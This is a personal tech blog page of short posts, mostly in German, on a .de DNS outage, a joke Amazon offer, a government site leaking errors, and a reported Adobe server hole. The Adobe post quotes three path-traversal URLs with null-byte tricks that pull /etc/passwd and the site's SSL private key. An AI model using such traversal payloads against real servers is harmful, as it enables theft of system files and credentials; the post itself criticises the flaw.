// Global DNS problems regarding the .de Top Level Domain [Update2]

Half of the Internet seems to be down today. Most sites I wanted to visit where not accessible because of a timeout.1)

First I thought the DNS server of my provider is down, this would not be the first time. But the problem still exists after switching to another, non-provider DNS server. Doing some research, it comes to light that there seems to be a serious problem regarding the whole .de-TLD caused by the DENIC root nameservers. Seriously – WTF?! 8-O 8-O

If this is true, it will be a really big problem. Should DENIC not fix it within the next hours, most .de based sites will not be reachable (at least if the provider DNS-caches are empty, common DNS A-RRs configurations got a TTL of 86400sec/1day).

Update: Yes, it is really a DENIC fail. So don't blame your provider and/or admin if your .de website is not reachable within the next hours.

Update2: DENIC released a public statement about the issue.

1)
e.g. ping andreas-haerter.de results in ping: “unknown host andreas-haerter.de”

// Sonderangebot des Jahres bei Amazon! NICHT VERPASSEN!!1!elf!!

Unglaublicher Rabatt

Da muss man doch zuschlagen, wo spart man sonst schon einen ganzen Cent?!

via Freundin :-D

// Da will man einmal was von der Bundesnetzagentur...

…und dann ist deren Website down. Lustig dass da Windows als Webserver rennt. Und die noch die alte mysql-PHP-Lib einsetzen. Folglich auch keine Stored Procedures (sind erst via mysqli nutzbar). Dazu passt dann, dass Fehlermeldungen öffentlich rausgepustet werden. Weia. :-P

// Adobe spart wohl am falschen Ende...

Irgendwie ging das an mir vorbei, was da Adobe vor rund einer Woche passiert ist: heise.de: Adobes Webserver sperrangelweit offen. Das CGI-Skript zum Download von Dateien hat einfach mal alles ausgeliefert, was man ihm über einen Parameter übergeben hat, z. B.:

  • http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version= ../../../../../../../../../etc/passwd%00
  • http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../usr/local/apache/conf/ssl.key/www.adobe.com.key%00
  • http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version= ../../../../../../../../../usr/local/apache/conf/ssl.crt/www.adobe.com.crt%00

:-O :-O

Ich bin immer wieder erstaunt darüber, wie oft auch bei professionellen Anwendern über trivialste Fallstricke wie “../” gestolpert wird. Klar, Fehler können passieren. Ich meine aber, Adobe hat sicherlich genug Kleingeld um Leute zu engagieren, denen Fehler dieser Kategorie eigentlich nicht passieren sollten. Das Ganze hat IMHO neben der allgemeinen Belustigung aber noch etwas wirklich Positives: es ist ein gutes Beispiel, dass nicht immer PHP schuld ist, wenn Anfänger solche Fehler in Serie produzieren. Man schafft dies in jeder Sprache. Das Problem sitzt eindeutig vor dem Bildschirm.

I'm no native speaker (English)
Please let me know if you find any errors (I want to improve my English skills). Thank you!
Recent Comments
QR Code: URL of current page
QR Code: URL of current page start (generated for current page)